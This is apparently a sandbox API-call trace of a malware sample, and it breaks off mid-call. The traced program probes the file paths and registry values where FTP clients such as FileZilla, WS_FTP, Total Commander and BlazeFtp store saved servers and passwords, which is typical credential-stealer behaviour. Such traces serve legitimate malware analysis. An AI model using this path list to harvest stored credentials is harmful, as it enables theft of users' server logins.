GetProcessHeap () returned 0x6a0000 [0128.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0128.622] GetProcessHeap () returned 0x6a0000 [0128.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab460 [0128.622] GetProcessHeap () returned 0x6a0000 [0128.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0128.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.624] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x6bab10 | out: phkResult=0x6bab10*=0x0) returned 0x2 [0128.625] GetProcessHeap () returned 0x6a0000 [0128.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0128.625] GetProcessHeap () returned 0x6a0000 [0128.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.625] GetProcessHeap () returned 0x6a0000 [0128.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x6a0000) returned 1 [0128.625] GetProcessHeap () returned 0x6a0000 [0128.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.627] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.628] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.628] GetProcessHeap () returned 0x6a0000 [0128.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bb458 [0128.636] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.637] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0128.637] GetProcessHeap () returned 0x6a0000 [0128.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.637] GetProcessHeap () returned 0x6a0000 [0128.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.639] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0128.639] GetProcessHeap () returned 0x6a0000 [0128.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.640] GetProcessHeap () returned 0x6a0000 [0128.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.641] GetProcessHeap () returned 0x6a0000 [0128.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bb458 [0128.642] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.643] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0128.643] GetProcessHeap () returned 0x6a0000 [0128.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b9518 [0128.643] GetProcessHeap () returned 0x6a0000 [0128.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.645] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0128.645] GetProcessHeap () returned 0x6a0000 [0128.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.646] GetProcessHeap () returned 0x6a0000 [0128.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f7c) returned 0x6bb458 [0128.646] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.647] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0128.647] GetProcessHeap () returned 0x6a0000 [0128.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.648] GetProcessHeap () returned 0x6a0000 [0128.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.649] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0128.649] GetProcessHeap () returned 0x6a0000 [0128.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.650] GetProcessHeap () returned 0x6a0000 [0128.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f78) returned 0x6bb458 [0128.650] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.651] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0128.651] GetProcessHeap () returned 0x6a0000 [0128.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.651] GetProcessHeap () returned 0x6a0000 [0128.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.653] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0128.653] GetProcessHeap () returned 0x6a0000 [0128.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.654] GetProcessHeap () returned 0x6a0000 [0128.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.655] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.655] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.655] GetProcessHeap () returned 0x6a0000 [0128.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bb458 [0128.669] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.671] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0128.671] GetProcessHeap () returned 0x6a0000 [0128.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.671] GetProcessHeap () returned 0x6a0000 [0128.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.672] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0128.673] GetProcessHeap () returned 0x6a0000 [0128.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.674] GetProcessHeap () returned 0x6a0000 [0128.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.674] GetProcessHeap () returned 0x6a0000 [0128.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f68) returned 0x6bb458 [0128.675] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.675] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0128.675] GetProcessHeap () returned 0x6a0000 [0128.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b7fe0 [0128.676] GetProcessHeap () returned 0x6a0000 [0128.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.677] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0128.677] GetProcessHeap () returned 0x6a0000 [0128.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7fe0 | out: hHeap=0x6a0000) returned 1 [0128.678] GetProcessHeap () returned 0x6a0000 [0128.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0128.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.681] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb3c*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb3c*=0x104) returned 0x2 [0128.681] GetProcessHeap () returned 0x6a0000 [0128.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.682] GetProcessHeap () returned 0x6a0000 [0128.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.683] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.683] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.683] GetProcessHeap () returned 0x6a0000 [0128.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6bb458 [0128.684] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.685] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0128.685] GetProcessHeap () returned 0x6a0000 [0128.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6c) returned 0x6b9518 [0128.685] GetProcessHeap () returned 0x6a0000 [0128.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.715] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0128.715] GetProcessHeap () returned 0x6a0000 [0128.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.716] GetProcessHeap () returned 0x6a0000 [0128.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.717] GetProcessHeap () returned 0x6a0000 [0128.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.718] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.718] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.718] GetProcessHeap () returned 0x6a0000 [0128.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f82) returned 0x6bb458 [0128.719] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.720] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0128.720] GetProcessHeap () returned 0x6a0000 [0128.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6b9518 [0128.720] GetProcessHeap () returned 0x6a0000 [0128.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.722] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0128.722] GetProcessHeap () returned 0x6a0000 [0128.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.723] GetProcessHeap () returned 0x6a0000 [0128.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.723] GetProcessHeap () returned 0x6a0000 [0128.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f76) returned 0x6bb458 [0128.724] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.725] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0128.725] GetProcessHeap () returned 0x6a0000 [0128.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.725] GetProcessHeap () returned 0x6a0000 [0128.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.727] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0128.727] GetProcessHeap () returned 0x6a0000 [0128.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.727] GetProcessHeap () returned 0x6a0000 [0128.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.728] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.729] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.729] GetProcessHeap () returned 0x6a0000 [0128.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bb458 [0128.730] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.731] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0128.731] GetProcessHeap () returned 0x6a0000 [0128.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.731] GetProcessHeap () returned 0x6a0000 [0128.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.733] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0128.733] GetProcessHeap () returned 0x6a0000 [0128.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.733] GetProcessHeap () returned 0x6a0000 [0128.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.734] GetProcessHeap () returned 0x6a0000 [0128.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.735] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.735] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Windows") returned 0x0 [0128.737] GetProcessHeap () returned 0x6a0000 [0128.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0128.739] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.740] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0128.740] GetProcessHeap () returned 0x6a0000 [0128.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x6b7b28 [0128.740] GetProcessHeap () returned 0x6a0000 [0128.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.742] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0128.743] GetProcessHeap () returned 0x6a0000 [0128.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7b28 | out: hHeap=0x6a0000) returned 1 [0128.743] GetProcessHeap () returned 0x6a0000 [0128.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.744] GetProcessHeap () returned 0x6a0000 [0128.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0128.745] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.746] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0128.746] GetProcessHeap () returned 0x6a0000 [0128.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x66) returned 0x6b9518 [0128.746] GetProcessHeap () returned 0x6a0000 [0128.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.747] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0128.747] GetProcessHeap () returned 0x6a0000 [0128.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.748] GetProcessHeap () returned 0x6a0000 [0128.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.749] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.749] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0128.749] GetProcessHeap () returned 0x6a0000 [0128.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0128.750] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.771] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0128.771] GetProcessHeap () returned 0x6a0000 [0128.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x46) returned 0x6b5150 [0128.771] GetProcessHeap () returned 0x6a0000 [0128.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.772] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0128.772] GetProcessHeap () returned 0x6a0000 [0128.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5150 | out: hHeap=0x6a0000) returned 1 [0128.773] GetProcessHeap () returned 0x6a0000 [0128.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.774] GetProcessHeap () returned 0x6a0000 [0128.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bb458 [0128.774] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.775] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0128.775] GetProcessHeap () returned 0x6a0000 [0128.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x6b8060 [0128.775] GetProcessHeap () returned 0x6a0000 [0128.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.777] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0128.777] GetProcessHeap () returned 0x6a0000 [0128.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8060 | out: hHeap=0x6a0000) returned 1 [0128.777] GetProcessHeap () returned 0x6a0000 [0128.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0128.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.778] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104) returned 0x2 [0128.778] GetProcessHeap () returned 0x6a0000 [0128.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.779] GetProcessHeap () returned 0x6a0000 [0128.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.781] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.781] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.781] GetProcessHeap () returned 0x6a0000 [0128.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6bb458 [0128.782] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.783] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0128.783] GetProcessHeap () returned 0x6a0000 [0128.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6c) returned 0x6b9518 [0128.783] GetProcessHeap () returned 0x6a0000 [0128.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.785] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0128.786] GetProcessHeap () returned 0x6a0000 [0128.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.786] GetProcessHeap () returned 0x6a0000 [0128.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.787] GetProcessHeap () returned 0x6a0000 [0128.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bb458 [0128.788] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.789] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0128.790] GetProcessHeap () returned 0x6a0000 [0128.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b9518 [0128.790] GetProcessHeap () returned 0x6a0000 [0128.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.792] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0128.792] GetProcessHeap () returned 0x6a0000 [0128.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.793] GetProcessHeap () returned 0x6a0000 [0128.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.794] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.795] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.796] GetProcessHeap () returned 0x6a0000 [0128.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f68) returned 0x6bb458 [0128.797] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.798] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0128.798] GetProcessHeap () returned 0x6a0000 [0128.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x6b9518 [0128.798] GetProcessHeap () returned 0x6a0000 [0128.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.800] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0128.800] GetProcessHeap () returned 0x6a0000 [0128.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.801] GetProcessHeap () returned 0x6a0000 [0128.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.801] GetProcessHeap () returned 0x6a0000 [0128.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.802] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.803] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Windows") returned 0x0 [0128.803] GetProcessHeap () returned 0x6a0000 [0128.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5a) returned 0x6bb458 [0128.804] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.804] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\WS_FTP.INI", arglist=0x19fb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0128.804] GetProcessHeap () returned 0x6a0000 [0128.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2e) returned 0x6b7a80 [0128.804] GetProcessHeap () returned 0x6a0000 [0128.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.806] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") 